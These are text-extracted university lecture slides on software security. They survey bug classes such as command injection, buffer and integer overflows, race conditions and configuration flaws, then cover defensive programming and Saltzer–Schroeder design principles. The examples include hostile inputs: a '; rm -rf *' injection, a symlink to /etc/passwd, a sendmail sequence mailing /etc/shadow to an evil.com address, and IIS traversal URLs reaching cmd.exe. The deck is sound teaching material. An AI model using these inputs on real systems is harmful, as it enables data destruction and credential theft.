Docstoc

PPT

Document Sample
PPT Powered By Docstoc
					   SENG 5199-3
Data and Network
     Security
      Lecture 5
 Software Security (I)
      Max Schuchard
       News This Week (1)

• Boffins devise 'cyberweapon'

• Microsoft’s Net Security Plan
      COMMON SECURITY BUGS

The most common reason for security bugs
is misplaced trust: programmers assume
that inputs, systems, or persons are trustworthy.

An adversary will look for these assumptions
and find ways to invalidate them.


Today, a few examples. For more see
Anderson; 19 Deadly Sins; Wheeler; …
       WEAK INPUT CHECKING
Adversaries can often control program inputs:
  – Direct input: command line, keyboard, …
  – Function calls
  – Config files
  – Network packets
  – Web forms…
Bug: it is common to assume input is “benign”

Example: null-byte certificate.
            EXAMPLE: system()
Web forms are often processed by scripts that
need to run other programs on the server.
Usually scripts use C’s system() or popen().
 Bug: these calls invoke a shell. Command
 separators like “|” and “;” allow the user to
 run other commands on the server.
Form.cgi:                    Attacker inputs:
# … start html …
system(“grep $test file”);
                             “; rm –rf *”
# … do other stuff …


       Web Server runs:
       “grep ; rm –rf * file”
         BUFFER OVERFLOW
Programmers often assume that inputs will
have a certain length.


When this is false, other program variables
or system data structures can be overwritten.


Exasperated by C standard libraries:
null-terminated strings, off-by-one errors, etc.
                     EXAMPLE
      void check_input(char *input) {
        char buf[8];
        strcpy(buf,input);
        if (check(buf)) allow_action();
        return;
      }
      check_input stack frame:
                     Ret. Addr.       Address to jump
input pointer (4B)   char *input      to at return (4B)
                     buf[7]
                     buf[6]
                       …
                                   Local variables (8B)
                     buf[1]
                     buf[0]

          Bug: what if strlen(input) > 7 ?
          INTEGER OVERFLOW
Machine integers are not real integers.

  void caller() {
        unsigned int a = read_int_from_network();
        char *z = read_string_from_network();
        if (a > 0) callee(a,z);
  }
  void callee(int a, char* z) {
        char buffer[10]; // … do some other stuff…
        for(int i = 0; i + a < 10 && z[i]; i++)
                buffer[a+i] = z[i];
        return;
  }

            Bug: what if a = 232-10?
Example: iPhone SMS exploit…
           RACE CONDITIONS
A race condition occurs when there is a nonzero
time interval between checking some property
and when it needs to hold true.

Example: Viega & McGraw elevator story.


Race conditions are often called Time of Check /
Time of Use (TOCTOU) vulnerabilities.
                  EXAMPLES
• File permission checks:
  int safe_open_file(char *path) {
    int fd = -1;
    struct stat s;
    stat(path, &s)
    if (!S_ISREG(s.st_mode))
     error("only regular files allowed");
    else fd = open(path, O_RDONLY);
    return fd;
  }
• path can point to a different file after stat!
                 EXAMPLE
• Ghostscript creates a lot of temporary files:

     name = mktmp("/tmp/gs_XXXXXXXX");
     fp = fopen(name,"w");

• Attacker creates symlink
      /tmp/gs_12345A -> /etc/passwd
  between call to mktmp and fopen, when root
  is running gs (just has to happen once!)

• Ghostscript (as root) overwrites /etc/passwd.
       NEW ENVIRONMENTS
A good way to violate program assumptions is
to run the program in an environment where
they are false!
• Berkeley rhosts vulnerabilities
  – /etc/hosts.equiv – list of hosts to accept
    rsh connections from
  – Assume a closed network
  – Frequently: “+\n” - superuser can rlogin
    without password from other hosts on LAN
  – LAN gets connected to internet…
                  EXAMPLE
• Cell phones have two requirements:
  – Calls should be placed and billed correctly
  – Voice data should be delivered quickly
• Designed with two channels
  – Control channel, slow and very reliable
  – Data channel, high bandwidth & lossy
• “Text messages” (SMS): don’t tolerate loss.
  – So use the Control Channel!
• Txt2web interfaces: send from a computer!
• DoS: sending 165 SMS messages/second
  can wipe out Manhattan’s cellular network.
       FEEPING CREATURISM

• Many times the addition of more features
  results in more opportunities for bugs.
• Example: MS Office
  – “Macro Language” is VB with complete access to
    machine
  – User loads “I love you.doc” and macro runs, sets up
    back door.
• Old attack on some Unix PDF readers:
  – Victim clicks on a hyperlink in malicious PDF file
  – Reader calls system(“$BROWSER $hyperlink”)
  – Hyperlink ends with “; evil_command_line”
• New PDF attacks
              LOGGING BUGS

Many systems keep a transaction log for error
recovery, debugging, etc.

Typical bugs: assuming logs are treated as
sensitive, assuming data is not sensitive

Example: “security” log of failed login attempts.

PDG web transaction processing system:
• World-readable log file: cgi_bin/PDG_cart/order.log
• Contains mailing addresses, CC numbers, ...
• Google indexed sites with this file
    CONFIGURATION BUGS
Access control in most systems depends on
configuration. Many systems have weak
default (fail open) configurations.
       Default admin passwords
       Services on by default
     Security checks off by default
Sometimes it is hard to change!
Example: Windows NT/IIS
   – FrontPage server is turned on by default.
   – Password is admin password (default: admin)
   – Allows uploads, admin tasks, etc.
   UNNECESSARY PRIVILEGE

Most attacks are about gaining privileges:
access to additional programs, files, etc., on
a system.

If an attacker can gain the privileges of a
program, the program should give as few
additional privileges as possible.

This is called the Principle of Least Privilege.
                 EXAMPLES
• DOS/Windows: default to all privileges
• Unix: Problems with programs running as
  root
  – Unix requires many programs to run as root
  – Prime examples: sendmail, bind

• Many sendmail attacks, patches; eg
  telnet victim.com 25
  helo any.dns.name
  mail from: “| /bin/mail me@evil.com
    </etc/shadow”
  rcpt to: somebody@somewhere
  data ...
     (NON)-UNIQUE NAMES

Many security mechanisms rely on objects
having unique names.
• Blacklists: NetNanny, firewalls, IIS example…
  Bugs: aliases, symlinks, name resolution…

• SunOS 4.1.x “loadmodule”:
  – calls system(“/bin/ld.so”);
  – Problem: IFS environment variable
• Unqualified domain names:
  mydomain.us vs mydomain.us.net
                  EXAMPLE
IIS has the security goal that only commands
In the subdirectory /scripts should be executed.

So it checks that the URL matches /scripts/*.*

http://a.b.c.d/scripts/../../winnt/system32/cmd.exe?X

 IIS tries to fix this by filtering out URLs with
 “../” in them, before unicode expansion.
http://a.b.c.d/scripts/..%c0%af..%c0%afwinnt/
   system32/cmd.exe?X


                       www.sans.org/rr/threats/unicode.php
          LAYERED TRUST
• Security failures at one “layer” in a
  system can invalidate assumptions at
  higher layer.
• Examples:
  – Rhosts: assumes correct DNS/IP mappings.
    Various attacks invalidate this assumption.
  – AS/400: access control not enforced for
    assembly language programs by default
  – Java type errors: javac won’t overwrite
    array types; class files can.
  – Boot sequence: boot Linux from CD, mount
    hard disk, circumvent access controls…
       News This Week (2)

• Android Trojan

• Cold Boot Attacks (Storage)
•
DEFENSIVE PROGRAMMING

Best practices:
• Language/library and process
• Modularity
• Error conditions
• Input whitelisting
• Loop specification
• Integer ranges
 LANGUAGE/LIBRARY,PROCESS
• Design for security; design & code reviews
• Language and library make a difference
  – Type-safe languages vs C/ASM/Scripting
  – Safer string-handling, I/O libraries for C exist.
• Test cases that can help:
  – Long inputs, unprintable characters, extreme
    values
  – Format specifiers, newlines, NULs…
  – Malformed inputs: aliased or overlapping
    pointers, cyclic structures
• Regression testing
• Bug/Fault evaluation
         EXAMPLES
char charAt(char *str, int index) {
    return str[index];
}

char *double(char *str) {
    size_t len = strlen(str);
    char *p = malloc(2*len+1);
    strcpy(p, str);
    strcpy(p+len, str);
    return p;
}
         MODULAR DESIGN
• System should be broken down into
  modules:
  – Clear functionality: less chance of mental
    errors by caller
  – Clean interfaces: decrease possible
    interactions
• Least Privilege at the module level
  – E.g. inetd wrapper
  – E.g. web server
• Isolate modules: use language tools,
  system processes…, etc.
       ERROR CONDITIONS

• In languages without exceptions:
  – Check “error conditions” on return values
  – E.g. malloc(), open(), etc…
• Catch exceptions or declare them
• Think about where to handle errors
  – Fix locally
  – Propagate to caller
  – Fail-stop
        INPUT VALIDATION

• Before using an input value check
  that it is safe:
  – NULL, Out of range, invalid format,
    too long, too short, etc…
• Err on the side of caution:
  – I know this will be safe vs
  – I can’t think of a way to break this…
• E.g. whitelist safe inputs, rather
  than blacklist dangerous ones.
           EXAMPLE
char *username = getenv("USER");
char *buf = malloc(strlen(username)+6);
sprintf(buf, "mail %s", username);
FILE *f = popen(buf, "r");
fprintf(f, "Hi.\n");
fclose(f);

char *validate_username(char *u) {
  char *p;
  if (!u || *u < 'a' || *u > 'z')
    die();
  for (p=u+1; *p; p++)
    if ((*p < '0' || *p > '9')
        && (*p < 'a' || *p > 'z'))
        die();
  return u;
}
    LOOPS & MEMORY LEAKS
• Check preconditions for a loop
• Sanity check return values of functions
• Prefer (safe) exit with error condition to
  “muddle through”
• Avoid algorithm denial-of-service
  – Eg. Hash table with O(n) worst-case
• Safe exit:
  – Free allocated heap objects
  – Maintain consistent state
  – Use error conditions
        INTEGER OVERFLOWS
• Mismatch with programmer “mental model”
• Check for them!
  – Check inputs in proper range
  – Check (a+b) for overflow
  – Watch out for implicit casting, sign extension…
• Test corner cases: -1,0,1,231-1, -231 …
      SALTZER & SCHROEDER
Don’t forget your CODe MAP:

             Complete mediation
             Open design
        safe Defaults

           Mechanism
psychological Acceptability
            Privileges

           http://www.emergentchaos.com/starwars.html
    COMPLETE MEDIATION
• Check every access to every object
• Example:
  – Race conditions
  – Caching may fail: unexpected state change
            OPEN DESIGN

• Security of a system should not
  depend on secrecy of design
• Examples:
  – NT Password file in registry: Format
    reverse-engineered
  – “Backdoors” hidden in code: find with
    debuggers
• Open Design can improve “security.”
• Not a guarantee: GPG, Xwindows…
         FAIL-SAFE DEFAULT

• System failures should default to
  secure state
• Examples:
  – Allow vs Deny permissions
  – Firewall: ports default to closed
• Users will tell you if application fails
• Attackers won’t tell if security fails
              MECHANISM




Economy of Mechanism
Each edge is a bug opportunity. Minimize edges.
Least Common Mechanism
Minimize complexity of high-degree components
PSYCHOLOGICAL ACCEPTABILITY
 • If users don’t “buy in” to security
   mechanism, system is insecure
   – Passwords
   – Firewalls
 • If users don’t understand how to
   use security mechanism, system is
   insecure
   – PGP: “Why Johnny Can’t Encrypt…”
              PRIVILEGES

• Least Privilege:
  – Process should have only the privileges
    needed for function
  – Minimize impact of breech
  – Not supported in UNIX, not used in NT…
• Separation of privilege
  – Multiple checks for access: Keycard +
    voiceprint
  – Multiple principals: launch codes, bank
    vaults…
          WORK FACTOR

• Cost of attack should exceed
  resources attacker will spend
• Crypto work factors are “easy”
• Work factor to exploit web server?
 – Finding vulnerabilities: cheap
 – Increase cost of exploitation
 – Convert to physical security
 COMPROMISE RECORDING

• If it is too expensive to prevent
  a compromise, record it.
• Examples:
  – Tamper evident vs. Tamperproof
  – Log files, network IDS
• Problems:
  – Root kit, etc…
        DEFENSE IN DEPTH

• Multiple, orthogonal defenses decrease
  probability of security failures.
• Orthogonal is key word.
• Examples:
  – “Belt and suspenders”
  – Firewall gateway and software firewall
  – Castle design

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:21
posted:10/7/2011
language:
pages:41